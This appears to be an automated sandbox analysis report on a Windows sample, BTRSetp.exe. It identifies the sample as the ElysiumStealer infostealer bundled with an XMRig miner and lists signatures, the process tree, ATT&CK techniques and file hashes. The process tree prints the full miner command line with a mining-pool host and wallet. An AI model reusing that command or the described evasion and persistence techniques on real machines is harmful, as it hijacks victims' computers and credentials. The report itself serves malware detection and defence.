Analysis

  • max time kernel
    60s
  • max time network
    53s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    06-03-2021 07:08

General

  • Target

    BTRSetp.exe

  • Size

    258KB

  • MD5

    1165ce455c6ff9ad6c27e49a8094b069

  • SHA1

    3ba061200d28f39ce95a2d493d26c8eb54160e85

  • SHA256

    c089f4a7b15f47edfe5c4748b2f34e8962bf115e6980355d67036be35c982eb1

  • SHA512

    dfa4109f3c0a6368c309ccfa0449823ad6388d122f9161e78044b48890126e26a1cfc36666f20b9800ac3ac6ced02c1132b40bb9131f5d6a5685ad5ec5a529a4

Malware Config

Signatures

  • ElysiumStealer

    ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.

  • ElysiumStealer Payload 3 IoCs
  • ElysiumStealer Support DLL 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • XMRig Miner Payload 1 IoCs
  • Executes dropped EXE 6 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • themida 3 IoCs

    Detects Themida, Advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\BTRSetp.exe
    "C:\Users\Admin\AppData\Local\Temp\BTRSetp.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4764
    • C:\ProgramData\7298322.80
      "C:\ProgramData\7298322.80"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3732
    • C:\ProgramData\5229012.57
      "C:\ProgramData\5229012.57"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:2464
      • C:\ProgramData\Windows Host\Windows Host.exe
        "C:\ProgramData\Windows Host\Windows Host.exe"
        3⤵
        • Executes dropped EXE
        PID:912
    • C:\ProgramData\844124.9
      "C:\ProgramData\844124.9"
      2⤵
      • Executes dropped EXE
      • Checks BIOS information in registry
      • Drops startup file
      • Adds Run key to start application
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3808
      • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:4548
    • C:\ProgramData\7269325.79
      "C:\ProgramData\7269325.79"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4204

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

Registry Run Keys / Startup Folder

1
T1060

Defense Evasion

Virtualization/Sandbox Evasion

1
T1497

Modify Registry

1
T1112

Credential Access

Credentials in Files

1
T1081

Discovery

Query Registry

3
T1012

Virtualization/Sandbox Evasion

1
T1497

System Information Discovery

3
T1082

Collection

Data from Local System

1
T1005

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\5229012.57
    MD5

    f7a040bef124bb5716718b77c788cbf4

    SHA1

    0ad2f39ab5786a0c918b70cd0ed5c97ffb828a18

    SHA256

    2b33279027a6c62d717f3c2875bbc7fcc323801265baadca4fa0fba619b677ea

    SHA512

    bb5af9692c5ca5bc76dd987ab15280cfec7ed05cfce5d8add4ae3b68f77e516b3cd8fb3ae02cdbeae62cb6a1db4c9b25e462f8f9c16e95daa50a6001d125a7f8

  • C:\ProgramData\5229012.57
    MD5

    f7a040bef124bb5716718b77c788cbf4

    SHA1

    0ad2f39ab5786a0c918b70cd0ed5c97ffb828a18

    SHA256

    2b33279027a6c62d717f3c2875bbc7fcc323801265baadca4fa0fba619b677ea

    SHA512

    bb5af9692c5ca5bc76dd987ab15280cfec7ed05cfce5d8add4ae3b68f77e516b3cd8fb3ae02cdbeae62cb6a1db4c9b25e462f8f9c16e95daa50a6001d125a7f8

  • C:\ProgramData\7269325.79
    MD5

    02d586b2b772f5bf3ff9068d03a7f9c1

    SHA1

    64f09d1f6ae801bfda1f782a14dcb08c1a2518f7

    SHA256

    a078e95bd8f961433ccb7465a866efffa4e1d23c6c1dceece246928133762bc9

    SHA512

    3c927b3b2b0b29b3f4ba06eaa18159e51ec4d1b45bbaae54f7a7bc37428b89127c8c6e14515be1221cbe938bc5adc5efd0fc77d855c8da52e5a6e4a0531cc993

  • C:\ProgramData\7269325.79
    MD5

    02d586b2b772f5bf3ff9068d03a7f9c1

    SHA1

    64f09d1f6ae801bfda1f782a14dcb08c1a2518f7

    SHA256

    a078e95bd8f961433ccb7465a866efffa4e1d23c6c1dceece246928133762bc9

    SHA512

    3c927b3b2b0b29b3f4ba06eaa18159e51ec4d1b45bbaae54f7a7bc37428b89127c8c6e14515be1221cbe938bc5adc5efd0fc77d855c8da52e5a6e4a0531cc993

  • C:\ProgramData\7298322.80
    MD5

    2586f08dfe627ea31b60e5d95abf6e73

    SHA1

    413320766fcc45a353c4d6c68647b48600580575

    SHA256

    3307ac37e52543cc7fa8e86732aade60a666eabcb47d5337378c7f11d5636480

    SHA512

    851bf6a564dd4d53af408324edb6db7fdf7491ef08a71057733ca7cfa5df7f9a1145adfddb49b6cc7aa8418ec56e4d8e9a8bd1c29a26f9f2e2147e66f56ce81a

  • C:\ProgramData\7298322.80
    MD5

    2586f08dfe627ea31b60e5d95abf6e73

    SHA1

    413320766fcc45a353c4d6c68647b48600580575

    SHA256

    3307ac37e52543cc7fa8e86732aade60a666eabcb47d5337378c7f11d5636480

    SHA512

    851bf6a564dd4d53af408324edb6db7fdf7491ef08a71057733ca7cfa5df7f9a1145adfddb49b6cc7aa8418ec56e4d8e9a8bd1c29a26f9f2e2147e66f56ce81a

  • C:\ProgramData\844124.9
    MD5

    880fd252bc4e801e6170002efb6aef4d

    SHA1

    b10c102503f73acc57fc14326108e300fa94f8f5

    SHA256

    9157304786300c4f67a767995b5432d524e18243642c8dc5f96a44b4792ae911

    SHA512

    91071cd35e463d06f42c1cfb80be89a4fb8749f4936e699080ff0088281a3483c03f19beefd8f9ab403364475327e15b5ee65162a917f7a47b162a8105fc40a2

  • C:\ProgramData\844124.9
    MD5

    880fd252bc4e801e6170002efb6aef4d

    SHA1

    b10c102503f73acc57fc14326108e300fa94f8f5

    SHA256

    9157304786300c4f67a767995b5432d524e18243642c8dc5f96a44b4792ae911

    SHA512

    91071cd35e463d06f42c1cfb80be89a4fb8749f4936e699080ff0088281a3483c03f19beefd8f9ab403364475327e15b5ee65162a917f7a47b162a8105fc40a2

  • C:\ProgramData\Windows Host\Windows Host.exe
    MD5

    f7a040bef124bb5716718b77c788cbf4

    SHA1

    0ad2f39ab5786a0c918b70cd0ed5c97ffb828a18

    SHA256

    2b33279027a6c62d717f3c2875bbc7fcc323801265baadca4fa0fba619b677ea

    SHA512

    bb5af9692c5ca5bc76dd987ab15280cfec7ed05cfce5d8add4ae3b68f77e516b3cd8fb3ae02cdbeae62cb6a1db4c9b25e462f8f9c16e95daa50a6001d125a7f8

  • C:\ProgramData\Windows Host\Windows Host.exe
    MD5

    f7a040bef124bb5716718b77c788cbf4

    SHA1

    0ad2f39ab5786a0c918b70cd0ed5c97ffb828a18

    SHA256

    2b33279027a6c62d717f3c2875bbc7fcc323801265baadca4fa0fba619b677ea

    SHA512

    bb5af9692c5ca5bc76dd987ab15280cfec7ed05cfce5d8add4ae3b68f77e516b3cd8fb3ae02cdbeae62cb6a1db4c9b25e462f8f9c16e95daa50a6001d125a7f8

  • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    MD5

    02569a7a91a71133d4a1023bf32aa6f4

    SHA1

    0f16bcb3f3f085d3d3be912195558e9f9680d574

    SHA256

    8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

    SHA512

    534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

  • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    MD5

    02569a7a91a71133d4a1023bf32aa6f4

    SHA1

    0f16bcb3f3f085d3d3be912195558e9f9680d574

    SHA256

    8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

    SHA512

    534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

  • \Users\Admin\AppData\Local\Temp\Runtime.MSIL.1.0.0.0\NativePRo.dll
    MD5

    94173de2e35aa8d621fc1c4f54b2a082

    SHA1

    fbb2266ee47f88462560f0370edb329554cd5869

    SHA256

    7e2c70b7732fb1a9a61d7ce3d7290bc7b31ea28cbfb1dbc79d377835615b941f

    SHA512

    cadbf4db0417283a02febbabd337bf17b254a6eb6e771f8a553a140dd2b04efd0672b1f3175c044a3edd0a911ce59d6695f765555262560925f3159bb8f3b798

  • memory/912-59-0x000000000EB30000-0x000000000EB31000-memory.dmp
    Filesize

    4KB

  • memory/912-60-0x0000000005700000-0x0000000005701000-memory.dmp
    Filesize

    4KB

  • memory/912-46-0x00000000732D0000-0x00000000739BE000-memory.dmp
    Filesize

    6.9MB

  • memory/912-43-0x0000000000000000-mapping.dmp
  • memory/2464-14-0x00000000732D0000-0x00000000739BE000-memory.dmp
    Filesize

    6.9MB

  • memory/2464-25-0x0000000000B00000-0x0000000000B0D000-memory.dmp
    Filesize

    52KB

  • memory/2464-22-0x00000000005A0000-0x00000000005A1000-memory.dmp
    Filesize

    4KB

  • memory/2464-27-0x000000000A310000-0x000000000A311000-memory.dmp
    Filesize

    4KB

  • memory/2464-19-0x0000000000070000-0x0000000000071000-memory.dmp
    Filesize

    4KB

  • memory/2464-11-0x0000000000000000-mapping.dmp
  • memory/2464-29-0x0000000009E10000-0x0000000009E11000-memory.dmp
    Filesize

    4KB

  • memory/2464-32-0x0000000002340000-0x0000000002341000-memory.dmp
    Filesize

    4KB

  • memory/3732-36-0x0000000004920000-0x0000000004954000-memory.dmp
    Filesize

    208KB

  • memory/3732-8-0x0000000000000000-mapping.dmp
  • memory/3732-34-0x0000000004FD0000-0x0000000004FD1000-memory.dmp
    Filesize

    4KB

  • memory/3732-40-0x0000000000FD0000-0x0000000000FD1000-memory.dmp
    Filesize

    4KB

  • memory/3732-21-0x0000000000F70000-0x0000000000F71000-memory.dmp
    Filesize

    4KB

  • memory/3732-17-0x00000000005D0000-0x00000000005D1000-memory.dmp
    Filesize

    4KB

  • memory/3732-15-0x00000000732D0000-0x00000000739BE000-memory.dmp
    Filesize

    6.9MB

  • memory/3808-71-0x0000000005620000-0x0000000005621000-memory.dmp
    Filesize

    4KB

  • memory/3808-49-0x0000000077104000-0x0000000077105000-memory.dmp
    Filesize

    4KB

  • memory/3808-52-0x0000000000E50000-0x0000000000E51000-memory.dmp
    Filesize

    4KB

  • memory/3808-23-0x0000000000000000-mapping.dmp
  • memory/3808-47-0x00000000732D0000-0x00000000739BE000-memory.dmp
    Filesize

    6.9MB

  • memory/4204-41-0x00000000023F0000-0x00000000023F6000-memory.dmp
    Filesize

    24KB

  • memory/4204-66-0x0000000005D90000-0x0000000005D91000-memory.dmp
    Filesize

    4KB

  • memory/4204-33-0x00000000732D0000-0x00000000739BE000-memory.dmp
    Filesize

    6.9MB

  • memory/4204-38-0x00000000001C0000-0x00000000001C1000-memory.dmp
    Filesize

    4KB

  • memory/4204-51-0x0000000004A00000-0x0000000004A01000-memory.dmp
    Filesize

    4KB

  • memory/4204-28-0x0000000000000000-mapping.dmp
  • memory/4204-61-0x0000000005730000-0x0000000005731000-memory.dmp
    Filesize

    4KB

  • memory/4548-69-0x0000000000000000-mapping.dmp
  • memory/4548-73-0x00000000001B0000-0x00000000001C4000-memory.dmp
    Filesize

    80KB

  • memory/4548-74-0x0000000140000000-0x0000000140B75000-memory.dmp
    Filesize

    11.5MB

  • memory/4548-75-0x00000000004D0000-0x00000000004F0000-memory.dmp
    Filesize

    128KB

  • memory/4548-76-0x00000000004F0000-0x0000000000510000-memory.dmp
    Filesize

    128KB

  • memory/4764-6-0x0000000000600000-0x0000000000633000-memory.dmp
    Filesize

    204KB

  • memory/4764-7-0x0000000000640000-0x0000000000641000-memory.dmp
    Filesize

    4KB

  • memory/4764-16-0x000000001AD10000-0x000000001AD12000-memory.dmp
    Filesize

    8KB

  • memory/4764-5-0x00000000005F0000-0x00000000005F1000-memory.dmp
    Filesize

    4KB

  • memory/4764-2-0x00007FF942830000-0x00007FF94321C000-memory.dmp
    Filesize

    9.9MB

  • memory/4764-3-0x00000000000C0000-0x00000000000C1000-memory.dmp
    Filesize

    4KB